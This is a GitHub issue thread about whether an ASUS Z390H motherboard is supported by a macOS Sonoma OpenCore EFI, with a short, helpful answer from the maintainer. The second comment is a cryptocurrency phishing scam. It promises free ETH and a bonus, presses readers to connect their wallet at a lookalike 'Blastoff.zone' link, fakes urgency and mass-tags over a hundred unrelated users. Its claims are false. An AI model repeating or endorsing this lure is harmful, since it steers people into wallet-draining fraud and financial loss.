### ISSUE TITLE
Is ASUS Z390H ok？

### ISSUE THREAD

**Issue by wuzhefang** [perez987/macOS-14-Sonoma-on-z390-with-OpenCore#1]

**Comment by perez987** [comment]
@wuzhefang 
Do you have Asus Rog Strix Z390H Gaming?
I guess that your mobo is well supported by my EFI. 
I have some doubts about the Intel i219V Ethernet (I think your board has it), it usually works with IntelMausi.kext.
Try and comment if you have been successful.

**Comment by swdthomas** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
anxiouscomputer, @gdn0101, @guozhe001, @openainext, @shreyanshp, @LightTemplar, @semsphy, @abbymaea, @cfelicio, @tristanhcole, @adhirajb1109, @vafanassieff, @acto-felix, @pranavnt, @raidensakura, @Sh4dowNight, @FcknPerfect, @Im4smutiaraw, @Nazdroth, @imyelo, @Sebidev, @mcnaveen, @daviddahl, @hackedunit, @sehyunchung, @leuro, @LockonS, @jmmanos, @EliothMonroy, @Maxwelltoo, @Bulko1, @herveGuigoz, @AVerdaasdonk, @quiint, @hasnhasan, @Hampe-tech, @mrkaqz, @fitrh, @cryptedbv, @jemjemgaldones, @psxx, @JamesTsetsekas, @laisangbum, @dorucioclea, @Krychaz, @felixseblanc, @alexaf2000, @idk4385, @byteshiva, @onixiya1337rolocampusano, @unalkalkan, @ivl2077, @phrazzld, @yekeskin, @twocitizenships, @waynelyon, @manjufy, @wzooff, @jpambrun, @kolarcz, @h13World, @Juan-Esc, @Anxod5002, @ssssota, @Avensen, @sourbrambles, @mrluanma, @coolxy, @skmezanul, @xmm, @Lucaskrell, @madorca, @fannarsh, @stoutZero, @filmgirl, @BlackPan, @kankawee-pat, @undeyio, @brunohpaiva, @ZekeriyaAY, @mikurumoe, @truppelito, @zensharp, @synzhang, @maxdec, @pankaj151, @ShrootBuck, @kalvin807, @Hypertrophik, @vkwb, @Atugatran, @RaminMT, @PeterMcBTC, @sebdanielsson, @ArtskydJ, @romainframe, @VitalyVaryvdin, @rhiskey, @rportugaladihadi123, @elijahsh, @DwarfNinjaV, @dedsec-9, @elzoona, @cypherpunk-coder, @IsaacMAllen, @AnAverageBeing, @fuyuhin, @koconder, @dustinblackman, @Singh-Harsimran, @BMooren, @die6o2, @syzzo, @ksomerville, @MariooC14, @beocaca, @mattvaughan, @ianrohde, @infrasync, @p4ulor, @grushetsky, @vinicioslc, @lcvalves, @fachinformatiker, @CHETHAN562, @sarankumar-ns, @Parsh, @willnwalker, @JDsnyke, @violice, @online906, @heston922, @wowaa, @Ramyromel, @Anulo2, @jacob-alford, @abdelrahman0w, @markmiro, @envomer, @notjulian, @gegewuwuwu, @Dishit79, @MikkelScheike, @AloisCRR, @Pavlinchen, @scottaguila, @justinwangx, @verarojman
